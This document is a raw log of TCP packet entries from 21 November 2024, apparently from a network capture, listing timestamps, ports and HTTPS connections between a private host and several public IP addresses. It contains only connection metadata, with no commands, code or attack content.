                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354280949 CET49823443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354435921 CET4434982413.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354486942 CET49823443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354526043 CET49824443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354556084 CET4434982313.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354737997 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354757071 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354804039 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354813099 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354839087 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354856968 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.355128050 CET4434982213.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.355189085 CET49822443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.355437994 CET49824443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.355530024 CET4434982413.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.355556011 CET49821443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.356682062 CET49822443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.356767893 CET4434982213.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.357006073 CET49823443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.357013941 CET4434982313.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.357433081 CET49824443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.357455969 CET4434982413.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.357528925 CET49822443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.357544899 CET4434982213.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.363044024 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.363059998 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:46.118021011 CET49822443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:46.118411064 CET49825443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:46.118426085 CET4434982513.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:46.120814085 CET49822443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:46.120830059 CET4434982213.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.513627052 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.513700008 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.514224052 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.514230013 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.516457081 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.516463995 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.680547953 CET4434982613.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.680684090 CET4434982713.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.680871010 CET49826443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.680891037 CET4434982613.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.681102037 CET49827443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.681122065 CET4434982713.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.681251049 CET4434982613.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.681464911 CET4434982713.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.681760073 CET49826443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.681834936 CET4434982613.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.682212114 CET49826443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.682214975 CET49827443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.682267904 CET49827443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.682282925 CET4434982713.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.727328062 CET4434982613.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.732563019 CET49827443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.288225889 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.288249016 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.288264036 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.288325071 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.288340092 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.288357973 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.288384914 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.342988014 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.343012094 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.343074083 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.343096972 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.343111038 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.343373060 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.475271940 CET4434982613.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.477725983 CET4434982613.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.477791071 CET49826443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.478677988 CET49826443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.478707075 CET4434982613.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.506630898 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.506654024 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.506730080 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.506767988 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.506824017 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.537564039 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.537585974 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.537687063 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.537724018 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.537858009 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.574774981 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.574825048 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.574893951 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.574923038 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.574935913 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.575021029 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.609680891 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.609702110 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.609761000 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.609798908 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.609813929 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.609839916 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.729876041 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.729896069 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.729957104 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.729981899 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.730005026 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.730025053 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:48.736602068 CET4434982713.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.340225935 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.340251923 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.340323925 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.340378046 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.340411901 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.340426922 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.347194910 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.347212076 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.347285986 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.347305059 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.347379923 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.354881048 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.354896069 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.355010986 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.355027914 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.355145931 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.361149073 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.361166000 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.361223936 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.361237049 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.361259937 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.361319065 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.368588924 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.368607044 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.368674040 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.368705034 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.368860006 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.371735096 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.371810913 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.371815920 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.371866941 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.371974945 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.371988058 CET4434982849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.371995926 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.372092009 CET49828443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.635232925 CET49829443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.635288954 CET4434982949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.635436058 CET49829443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.635720968 CET49829443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:49.635736942 CET4434982949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.133502960 CET4434982949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.133574009 CET49829443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.147831917 CET49829443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.147845984 CET4434982949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.150949955 CET49829443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.150958061 CET4434982949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.520407915 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.520437956 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.520529032 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.520713091 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.520728111 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.915319920 CET4434982949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.915348053 CET4434982949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.915365934 CET4434982949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.915574074 CET49829443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.915600061 CET4434982949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.915656090 CET49829443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.969712019 CET4434982949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.969733953 CET4434982949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.969835043 CET49829443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.969855070 CET4434982949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.969902039 CET49829443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:52.133469105 CET4434982949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:52.133490086 CET4434982949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:52.133670092 CET49829443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:52.133683920 CET4434982949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:52.133752108 CET49829443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:52.165086031 CET4434982949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:52.165103912 CET4434982949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:52.165211916 CET49829443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:52.165230036 CET4434982949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:52.165292978 CET49829443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:52.201406956 CET4434982949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:52.201426029 CET4434982949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.374489069 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.374563932 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.374641895 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.382391930 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.390727997 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.390824080 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.390834093 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.399147987 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.399374008 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.399382114 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.415777922 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.415827990 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.415834904 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.424174070 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.424320936 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.424371004 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.424379110 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.424463034 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.432615995 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.479007959 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.479028940 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.525902987 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.525928974 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.561903954 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.562007904 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.562016964 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.572772026 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.572818995 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.572839022 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.572860956 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.572917938 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.580065012 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.587146044 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.587219000 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.587241888 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.594712973 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.594789028 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.594820023 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.601828098 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.601902008 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.601924896 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.608931065 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.609009981 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.609034061 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.616204023 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.616369963 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.616399050 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.630513906 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.630599976 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.630616903 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.637660027 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.637723923 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.637726068 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.637737036 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.637787104 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.642582893 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.647672892 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.647735119 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.647743940 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.652695894 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.652765036 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.652772903 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.657501936 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.657582998 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.657591105 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.667272091 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.667336941 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.667345047 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.667426109 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.667473078 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.667479992 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.681448936 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.681529999 CET49830443192.168.2.8142.250.65.225
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.681536913 CET44349830142.250.65.225192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:54.648310900 CET44349805172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:54.648370028 CET44349805172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:54.648410082 CET49805443192.168.2.8172.64.41.3
